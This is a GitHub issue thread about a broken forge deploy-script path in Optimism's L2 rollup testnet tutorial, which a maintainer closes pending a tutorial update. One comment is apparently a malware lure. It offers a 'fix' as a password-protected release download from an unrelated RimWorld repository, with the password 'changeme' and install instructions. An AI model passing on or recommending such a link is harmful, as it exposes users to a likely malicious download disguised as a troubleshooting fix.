### ISSUE TITLE
[TUTORIAL] Creating Your Own L2 Rollup Testnet Deploy the L1 contracts

### ISSUE THREAD

**Issue by fuku-j** [ethereum-optimism/docs#867]
### Tutorial title

Creating Your Own L2 Rollup Testnet

## Tutorial
- Creating Your Own L2 Rollup Testnet

---

## Tag
- Deploy the L1 contracts

`forge script scripts/Deploy.s.sol:Deploy --private-key $GS_ADMIN_PRIVATE_KEY --broadcast --rpc-url $L1_RPC_URL --slow`
Error: No such file or directory (os error 2)👈scripts/Deploy.s.sol:Deploy

---

## Question

scripts/Deploy.s.sol:Deploy **Error**
scripts/deploy/Deploy.s.sol:Deploy 👈Is this correct?

### Tutorial tags

Deploy the L1 contracts

### Skill level

Intermediate

### Hosted on Optimism.io or hosted elsewhere?

Hosted on optimism.io

### For tutorials hosted elsewhere: URL to tutorial

https://docs.optimism.io/builders/chain-operators/tutorials/create-l2-rollup#deploy-the-l1-contracts

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by krofax** [comment]
@fuku-j  We are working on updating this tutorial, for now i'll close this issue, once the tutorial is revamped i'll escalate here, thanks for your patience.
